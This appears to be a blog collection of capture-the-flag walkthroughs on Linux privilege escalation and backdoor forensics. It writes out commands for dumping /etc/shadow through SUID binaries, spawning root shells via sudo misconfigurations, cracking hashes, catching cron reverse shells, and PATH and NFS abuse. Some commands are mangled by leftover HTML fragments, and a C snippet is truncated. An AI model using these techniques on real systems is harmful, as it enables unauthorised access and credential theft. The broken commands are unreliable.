
All posts tagged john

Walkthrough of the Capstone challenge which is the last task in the Linux privilege escalation room.


This piece is the continuation of the Linux Privilege Escalation room as that was just quite an extensive one so I’ve decided to put the challenge part into a separate article. We investigated a lot of aspects of privilege escalation vectors there, so now it’s high time to get the skills gathered tested.


Let’s start with some basic commands in our SSH session to get some more information about the victim. We can see that Leonard has no sudo rights at all unfortunately, so we cannot really get some help uploading Linpeas as we could not run it anyways. Let’s turn to SUID files then as that might be an easiest way of escalation.

find / -type f -perm -u=s 2>/dev/null

We can see a lot, but let’s just start with the very first one on the top, shall we. Upon visiting GTFOBins we can see that all we have to do is just initiating a couple of commands in our existing shell and hope for the best.

sudo install -m =xs $(which base64) .

./base64 "$LFILE" | base64 --decode

As per the description we do not have to put in the first line as base64 binary is there already. Executing the rest of the commands we are able to gather the password hashes from the shadow file. There are two interesting ones, “missy” and “root”. 


/usr/bin/base64 "$LFILE" | base64 --decode | grep missy


/usr/bin/base64 "$LFILE" | base64 --decode | grep root

Unfortunately, we only manage to crack missy’s hash in a reasonable timeframe.

john --wordlist=/usr/share/wordlists/rockyou.txt missy

Let’s login as missy and answer some questions.

What is the content of the flag1.txt file?

find / -name flag*.txt -type f 2>/dev/null

cat /home/missy/Documents/flag1.txt

Now, let’s just check whether missy has broader sudo rights by any chance. Well, it shows that she’s able to run the “find” binary with root privileges. Upon checking the potential break-out possibilities of that in GTFOBins, we find a oneliner which would spawn us a root shell.

sudo find . -exec /bin/sh \; -quit

Executing that command and upgrading the returning root shell to a fully interactive one we are clearly in a position to answer the final question of this section as well.

What is the content of the flag2.txt file?

sudo -l

sudo find . -exec /bin/sh \; -quit

python -c 'import pty; pty.spawn("/bin/bash")'

find / -name flag*.txt -type f 2>/dev/null

cat /home/rootflag/flag2.txt

Thanks for reading and as always, any feedback is most welcome.

Walkthrough of basic Linux privilege escalation techniques.


Privilege escalation sometimes could give you a bigger headache than getting into the target itself. This walkthrough is about to cover the main privilege escalation vectors and to give a better understanding of the process as in real-world penetration tests it is really rare to be able to gain initial access with administrative rights. After SSH-ing into the machine with the credentials provided, let’s start with getting the hostname, some general system information and environmental variables. The PATH variable may have a compiler or a scripting language (e.g. Python) that could be used to run code on the target system or leveraged for privilege escalation. We also can identify the running processes. Even with these couple of commands we could answer some of the questions of this section.

What is the hostname of the target system?

What is the Linux kernel version of the target system?

We should check what commands can be run with root privileges with the sudo command. Also it is a good practice when listing files ina directory to get the hidden files showed up with the “-la” switch.

The “id” command provides a general overview of the user’s privilege level and group memberships. This can be used for any user to check. The “/etc/passwd” file can be used to find all the users on the system. We are much better of with some trimming in the results and also with only listing actual human users whom probably have their folders in the “home” directory. Also it is useful to know all the interfaces using the “ifconfig” or “ip a” commands as potentially the target system may be a pivoting point to another network.

This can be further confirmed by the “ip route” and the “netstat” commands.

The “find” command is very useful to search for potentially important information. Also other linux commands might be conducive such as “version” to get a more precise picture about our victim computer. We also might harness some extra information about the operating system on the fly with writing out the content of the “os-release” file, however usually this is displayed anyway at the beginning of the SSH session. Anyways, we can answer some more questions in the section for sure.

What Linux is this?

What version of the Python language is installed on the system?

To find potential vulnerabilities on any targets usually it is a good practice to start with an online search. So, let’s start with that now too using the information gathered for the Linux kernel version earlier.

Ok, now we could either check directly the results in the browser or quickly look up some buzzwords found using the offline vulnerability database in our attacker machine for confirmation.

After copying and opening the C-code in a text editor and reading the comments I think it’s high time to try answering the last question of this section..

What vulnerability seem to affect the kernel of the target system?

Automated Enumeration Tools

There are automated enumeration tools also available online which could significantly speed up the process, for example LinPeas, LinEnum, LES, LSE or LPC.

Privilege Escalation: Kernel Exploits

Let us upload the appropriate Linux kernel exploit code to the victim machine. First starting with our usual Simple HTTP server from the right directory on our attacker machine, then navigating to the a directory on which write permission there are (e.g. /tmp). After this initiating a web request pointing to our attacker machine to get the file.

After this there is an important step to do.. the exploit source code needs to be compiled to make it executable on the target. In a situation like this a compiler needs to be available on the target to do that for us which is not guaranteed every time. We are lucky this time as GCC is there. Before jumping into this I also decided to upgrade the shell.

Now, we are in a position to harness flag1 as we already successfully found it above.

What is the content of the flag1.txt file?

Privilege Escalation: Sudo

System admins can configure which user with which privileges can execute different programs. To find out which programs a user can run with root privileges the “sudo -l” command should be used.

How many programs can the user “karen” run on the target system with sudo rights?

From the binary list above we can try any of them whether it is possible to break out from the restricted environment. Let us go to Get The Fuck Out Bins first and check these binaries for the possibilities to bypass local security restrictions on the target. Let’s try the “find” binary for a start.

Ok, that’s one option, let’s try it with the “less” binary.

The “less” binary is similar program to “more” but it does not have to read the entire input file before starting, so with large input files it starts up faster than other ones. What GTFOBins suggests is opening the “/etc/profile” file with it then simply changing the last line of the profile by pasting the “!/bin/sh” line as a substitute of “etc/profile/END” after the “fi” instruction which is basically the close of the “if” block. This would basically restart BASH with root privileges.

Let’s try “nano” out as well.

First call “nano” with sudo, then type CTRL+R (read file), then CTRL+X (exit). After this the “Command to execute” option will come up into which the “reset; sh 1>&0 2>&0” line should be pasted then hitting ENTER. Nano starts executing the command. After that all you need to do is just cancelling the process with CTRL+C and hit ENTER again a couple of times to get the root shell.

With this we are in a position to answer another question of this section.

What is the content of the flag2.txt file?

The next question could be easily answered with a simple search for Nmap on the GTFOBins site.

How would you use Nmap to spawn a root shell if your user had sudo rights on Nmap?

What is the hash of Frank’s password?

Privilege Escalation: SUID

Linux controls users vs file interactions via read/write/execute permissions within their allocated privilege levels. User privilege levels changes with SUID (Set-user Identification) and SGID (Set-group Identification). These allow files to be executed with the permission level of the file owner or the group owner, respectively. Let’s find first which files have SUID or SGID bits set on the victim machine.

From the list gathered the “base64” binary looks promising. Let’s look it up on GTFOBins whether the SUID bit of it can be tampered with.

Now, all we have to do is just using the SUID elevated privileges to get the user specific (user2) password and password shadow files printed. We specify the target files first, “/etc/shadow” and “/etc/passwd” then printing them out with the tampered base64 decoder program.

After this let’s copy them into two separate files on our attacker machine, “unshadow” them putting them into one file and finally let’s crack the hash with John. Now, we could answer some of the questions of this bit.

What is the password of “user2”?

Without grepping out “user2 ” from the shadow file, we could answer another question of the section.

Which user shares the name of a great comic book writer?

After locating “flag3.txt” we may use the same technique to answer the last question of the section.

What is the content of the flag3.txt file?

Privilege Escalation: Capabilities

Capabilities help manage privileges at a more granular level and such this also can be used to increase the privilege level of a process or binary. Let’s check first the enabled capabilities running the “getcap” command, so we could answer some questions of this section.

How many binaries have set capabilities?

What other binary can be used through its capabilities?

Now, we should go ahead and visit the GTFOBins site again and look up the listed binaries for capabilities issues. Let’s use the Vim binary for the break out. As all the prerequisites are there and ready, all we need to do is just using the 3rd command for Python 3 as suggested.

The command resets the screen and gives you a fresh root prompt.

This is also works for the other binary in question..

With the same clean root prompt returning.

Allowing us to answer the final question of the section..

What is the content of the flag4.txt file?

Privilege Escalation: Cron Jobs

There are two weak points of cron jobs. First is the privileges with which they run, second is the creator or system admin might has forgotten about it and it keeps running periodically no matter what. If the attacker is able to change a cron script which runs with root privileges the exploit code will run with the inherited root privileges. Let’s get the cron jobs listed first. What we can see is that there are a couple of binaries to be run in specific times and there are a number of jobs at the bottom of the screenshot which should run in every minute because in Layman’s Terms 5 asterisks means running a binary in every minute.

How many user-defined cron jobs can you see on the target system?

We can see that in Karen’s home folder the file is there, so let’s go ahead and open it up in nano, modify line 2 and 3 and also adding the IP and port number of our attacker machine, then setup a feline listener on the same port.

After saving and exiting Nano, let’s not to forget to make it executable.

We should receive a root shell in a minute. Let’s get an interactive shell spawned and find the flag of the section.

What is the content of the flag5.txt file?

nc -nlvp 1234


python3 -c 'import pty;pty.spawn("/bin/bash")'

find / -name flag*.txt -type f 2 srcset=/dev/null

cat /home/ubuntu/flag5.txt” width=”781″ height=”381″>

Now, to answer the last question of this section we have get Matt’s password hash printed then crack it with John on our attacker machine.

What is Matt’s password?

Privilege Escalation: PATH

The way in Linux binaries are executed is using1 the PATH (all uppercase) environmental variable which defines the route (path – all lowercase) to where executables are. Commands which are not built into the shell or have no absolute path are looked up in folders defined by the PATH variable. To answer the first question of this section we have to run a simple search for writable folders up to the depth of 2 folder [cut -d “/” -f 2,3], limiting the results to one instance per path [sort -u] and focusing on only the “home” folder [grep home] as per the hints of the question.

What is the odd folder you have write access for?

find / -writable 2 srcset=/dev/null | cut -d "/" -f 2,3 | sort -u | grep home” width=”866″ height=”47″>

For the rest of the questions to answer there are a couple things to do. First, we have to check what folders are added to the PATH environmental variable. Then we have to compare these folders with the writable folders available for us and if nothing is there, we have to add one. Finally, in the writable directory, we have to create a file which would print out the content of the flag text file. Also a script must be available somewhere which could be utilized to “activate” the file to print out that flag text file for us and which can be run as root. The reason behind this 2-tier file run is that the user has no permissions to run a file, but the “test” script runs with root privileges and that makes the privilege escalation possible for now. So, summarily, the file we create must be placed into a directory which is writable and also added to the PATH variable as the test script which is prepared for the purpose of this section will look for our file in the paths which are in the PATH variable. As such, we have two options here, either we use the “/tmp” folder which is writable by default usually or we can use the above discovered writable directory. Let’s create our file now in the “/tmp” directory into which we place the “cat” command to read the flag text file later on. Also do not forget to give the file executable permissions. First of all though we obviously need to find the flag itself as well as the full path of it needs to be identified to be added to our file.

find / -name flag*.txt -type f 2 srcset=/dev/null



echo "cat /home/matt/flag6.txt" > thm

chmod +x thm” width=”961″ height=”455″>

Now, let’s add the “/tmp” folder to the PATH variable.

echo $PATH

export PATH=/tmp:$PATH

echo $PATH

Now we can answer the rest of the questions of this section.

What is the content of the flag6.txt file?

For the sake of completeness, let’s check real quick how this would work with using the above discovered writable folder.

echo $PATH

export PATH=/home/murdoch:$PATH

echo $PATH

echo "cat /home/matt/flag6.txt" srcset= thm

chmod +x thm

./test” width=”962″ height=”430″>

Privilege Escalation: NFS

The first step of this this privilege escalation vector is to check the Network File Sharing (NFS) configuration which is kept in the /etc/exports file. This file is created during the NFS server installation and can usually be read by users. What we need to look for is the “no_root_squash” option as if this option is present on a writable share, we can create an executable with SUID bit set and run it on the target system. Let’s check the configuration first and then enumerate the mountable shares.

How many mountable shares can you identify on the target system?

How many shares have the “no_root_squash” option enabled?

cat /etc/exports

showmount -e

The way it will work in a nutshell is that we will create and compile an executable in the temporary directory “/tmp” of our target which is shared on our attacker machine. So, basically we will do all the steps on our own computer but the results will be mirrored on the target spawning a root shell for us. Let’s create and mount the chosen no_root_squash “/tmp” directory to our attacking machine first.

mkdir /tmp/victim

sudo mount -o rw /tmp/victim

Now, let’s create a simple executable C-code on our attacker machine in the mounted share folder that will run “/bin/bash” on the target system then compile it with GCC. Finally, we set the SUID bit as well.

cd /tmp/victim

nano nfs.c

int main()
{       setgid(0);
        return 0;

gcc nfs.c -o nfs -w

chmod +s nfs


We can get back to our SSH session now and due to the fact that we were working in the shared folder of our victim, all we have to do is just running the file we compiled. That would spawn our desired root shell on the victim and we can answer the final question of this section as well.

What is the content of the flag7.txt file?


cd tmp



find / -name flag*.txt -type f 2 srcset=/dev/null

cat /home/matt/flag7.txt” width=”937″ height=”408″>

Thanks for reading and as always, any feedback is most welcome.

Walkthrough of forensic analysis,  backdoor code analysis and attack route simulation.

Forensics – Analyse the PCAP

After downloading and opening the *.pcap capture file we should apply the “HTTP” or similar filter (e.g. port 80) to narrow down the volume of displayed traffic logs. Then just clicking on the first one to follow the TCP stream to get all the interactions between the client and server for that particular request, however the first question can be answered even without that checking the GET requests in the list quick.

What was the URL of the page they used to upload a reverse shell?

The next question asking for the payload itself can be answered more easily with some further filtering narrowing down to the requests looking for the “upload” word and then following up the TCP stream as before. We can see that the payload applied the usual feline reverse shell connecting back to port 4242.

What payload did the attacker use to gain access?

The same data filtering technique can be used to answer the next question with following up the TCP stream as before.

What password did the attacker use to privesc?

The same TCP stream can be used to answer the next questions as the attacker downloaded an ssh backdoor script written in “Go”. 

How did the attacker establish persistence?

After getting the hashes from the same TCP stream, let us save them in a text file than crack it with John. I have downloaded an untouched fasttrack wordlist as mine has been modified and then tried to crack the hashes with John.

Using the fasttrack wordlist, how many of the system passwords were crackable?

Research – Analyse the code

First of all let’s get the ssh-backdoor code using the discovered URL in the packet capture file cloning it from GitHub as the attacker did, and then look-up the hash and the salt in question from the code.

What’s the default hash for the backdoor? 

What’s the hardcoded salt for the backdoor? 

From the packet capture file the hash used by the attacker can be pulled out.

What was the hash that the attacker used? 

Let’s crack it with Hashcat to answer the next question.

What’s the password?

Attack – Get back in!

First of all let us navigate to the IP-address to check the website.

The attackers defaced the website. What message did they leave as a heading?

Now let’s run some Nmap scans to figure out the open ports. 3 TCP ports are open, 22, 80, 2222. The first 2 ones are obvious, but let’s try out the last one as probably that is the SSH backdoor port. We already know the password, don’t we..

What’s the user flag? 

Now we have the user flag, but the final aim is the root flag. According to the hint there should be a quick way to raise privileges. Let’s check what else do we have in the same directory in which the user flag was found. Well, it seems there is a root owned copy of bash there which according to GTFOBins can be utilized to preserve privileged access if the SUID bit is set. Let’s try that.

Now, that we are root, there is nothing else just to find the root flag.

Thanks for reading and as always, any feedback is most welcome.